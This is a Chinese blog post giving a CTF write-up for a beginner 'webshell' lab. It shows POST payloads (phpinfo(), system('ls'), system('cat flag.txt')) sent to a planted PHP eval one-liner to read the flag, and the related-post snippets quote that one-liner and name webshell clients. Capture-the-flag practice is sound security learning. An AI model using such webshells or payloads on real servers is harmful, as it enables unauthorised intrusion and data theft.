20220129--CTF WEB方向刷题-- WP--非常简单的webshell题

最新推荐文章于 2024-06-05 19:47:44 发布
最新推荐文章于 2024-06-05 19:47:44 发布
阅读量625 收藏 2
点赞数
分类专栏: CTF刷题 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/122748512
版权

CTF—攻防世界–新手场–webshell

攻防世界官网:https://adworld.xctf.org.cn/

更多CTF刷题平台汇总:
https://blog.csdn.net/qq_51550750/article/details/122748075

在这里插入图片描述

在这里插入图片描述

已经得知是POST请求且传参就是shell:
首先试试行不行:

shell=phpinfo();

在这里插入图片描述
成功:
在这里插入图片描述
再尝试系统命令:

shell=system("ls");

在这里插入图片描述

得到目录:
在这里插入图片描述
即:
在这里插入图片描述
然后读取flag.txt

shell=system("cat flag.txt");

最后得到flag:
在这里插入图片描述

cyberpeace{d90d7967bf055ef29131f36804424479}

qq_51550750
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web新手区webshell
Sk1y的博客
10-03 482
web新手区webshell 目 打开后显示如下 分析一下: 有一个名为shell的变量,其取值为post方式; eval()函数,简单来讲其作用是将()内的字符串作为脚本语言来执行,详细讲解请看这位大佬博文:https://blog.csdn.net/NinoYeves/article/details/73380553; @作用,将php语句表达式可能生成的错误信息忽略掉; 连起来看,这就是个php一句话木马。 解决方法: 方法一: 菜刀如图,将url填入,密码就是shell,类型是php,点
【愚公系列】2021年12月 攻防世界-简单-WEB-010(webshell)
热门推荐
时光隧道
12-25 3万+
文章目录一、webshell二、使用步骤1.点击获取在线场景2.webshell总结webshell相关例子webshell相关工具 一、webshell 目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 二、使用步骤 1.点击获取在线场景 2.webshell 进入网页 上中国蚁剑 发现flag:cyberpeace{250cf53b93cb75f6a7b240
CTFCTF竞赛介绍以及刷题网址
最新发布
m0_71744044的博客
06-05 713
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。PWN(溢出):PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的目,其中常见类型溢出漏洞有栈溢出、堆溢出。
XCTF_Web_新手练习区:webshell
1stPeak's Blog
06-13 688
第十webshell 目标: 看懂一句话木马 学会使用菜刀/蚁剑 菜刀下载链接:https://github.com/1stPeak/Caidao 蚁剑下载链接:https://github.com/AntSwordProject/antSword/releases Writeup (1)打开目标网址,出现如下所示: (2)哎呦,我们先分析一波,没有上传点,莫非?它已经将上图中的一...
墨者学院-WebShell代码分析溯源(第11)
JimWu的博客
09-04 236
WebShell代码分析溯源(第11) 难易程度:★★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载备份文件。 2.解压文件,分析代码。 3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。 我们继续分析一下代码,能看出代码中运用了str_replace函数。 该函数会把以其他字符替换字符串中的一些字符,在代码中就是把i...
一天一道CTF 第九天(WebShell
scrawman的博客
03-08 466
[极客大挑战 2019]Knife 网页里的提示已经很明显了,就是要用shell,一句话木马也给你写好了。那就打开蚁剑或者中国菜刀,URL地址就是这个网页的地址,连接密码是Syc,其它的保持默认即可。连接上后查看系统文件就能找到flag [护网杯 2018]easy_tornado 点进网页是三个文件,我们一个一个查看 flag.txt提示我们flag在fllllllllag文件里,而且我们看到URL里还要求了文件的哈希值,也就是说我们要读取fllllllllag文件就必须要知道它的哈希值。 we
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF-MISC关于各类编码习(湖工商扛把子)
03-17
在网络安全领域,尤其是Capture The Flag (CTF)竞赛中,Miscellaneous(杂项)部分常常涉及到各种编码问。这类目通常测试参赛者对不同编码格式的理解和应用能力,包括但不限于ASCII、Unicode、Base64、Hex、URL...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
攻防世界_web新手区webshellwp——蚁剑解法
weixin_52653109的博客
12-15 543
一句话木马,结构如图 进入环境,发现是个小马。 上蚁剑 第一种解法,右键再虚拟终端 然后在终端用ls查看文件,再用cat打开 第二种方法 右键打开文件管理 找到flag文件,再打开就好了。 ...
【和小白一起练习CTF攻防世界web基础练习(2)
xtcc的博客
08-11 3633
首先介绍一下webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。在Intruder界面中,选择Payloads,在中间左部的框框中导入弱密码文本,之后点击右上角的运行,最后破解出来的密码的length会与其他不同,得到flag。:打开之后,发现有输入密码,但是不管输入什么,永远都提示以下信息。...
phpweb后台拿shell简单方法
sxf_123456的博客
04-24 5942
关于phpweb后台拿shell简单方法。   首先登录后台admin.php   登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。    代码文件如下:             然后选择你的马儿再上传   上传后如果为iis
攻防世界web入门-webshell write up
m0_62851980的博客
03-29 434
目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 这重点在于对木马格式的了解和蚁剑的使用 打开网页页面只有一句话: 你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的语句字符串什么的全都当做代码执行,@表示后面..
攻防世界新手WEB
weixin_44512852的博客
09-23 1324
新手web cookie 网址:http://111.200.241.244:60981/ 目是cookie,可以在网页按F12进入控制器,在运行一次找到对于ip查看消息头中cookie的信息 这里可以看到在请求和响应消息头中cookie的name-value是look-here:cookie.php,所以看看cookie.php看看 图中可以看到,给了提示"See the http response"然后继续在控制台中查看response的内容,没有找到需要的内容,试一下用burpsuite抓取然后
ctf(一):攻防世界
天威一号
10-27 599
网址:https://adworld.xctf.org.cn/ 1、post传参 2、get传参直接在后面加 ?id=1 3、robots.txt 文件。 直接在网址后面加 robots.txt 就会显示后台文件; 4、index.php 后缀是.php的文档备份格式: index.php 备份后: index.php.bak 5、cookie 在f12中找储存中就会显示cookie选项,...
攻防世界web新手区总结
cherish的技术博
04-20 354
目录前言backupsimple_phpxff_refererget_postsimple_js 前言 我还是太菜了,这篇就放一些查了writeup的 攻防世界网址:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 backup 基础知识: 常见的备份文件后缀名有: .gi...
20220129--CTF刷题-- WEB方向--get_post--- GET方法和POST方法结合的简单
qq_51550750的博客
01-29 279
攻防世界-- WEB方向–新手场–第七–get_post 攻防世界的网址:https://adworld.xctf.org.cn/ 更多CTF刷题网站可以参考博客:(刷题网站和自己可以搭建的网站汇总) https://blog.csdn.net/qq_51550750/article/details/122748075 ?a=1 POST DATA打勾: 最后得到flag:cyberpeace{52a0a30288f0b6af8b5e0f0d8bb5923b} ...
CTF Web理论基础篇-第二课:工具集与php弱类型
在《002-CTF web理论基础篇-第二课理论基础.pdf》和《002-CTF web理论基础篇-第二课理论基础》中,我们学习了关于CTF网页型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值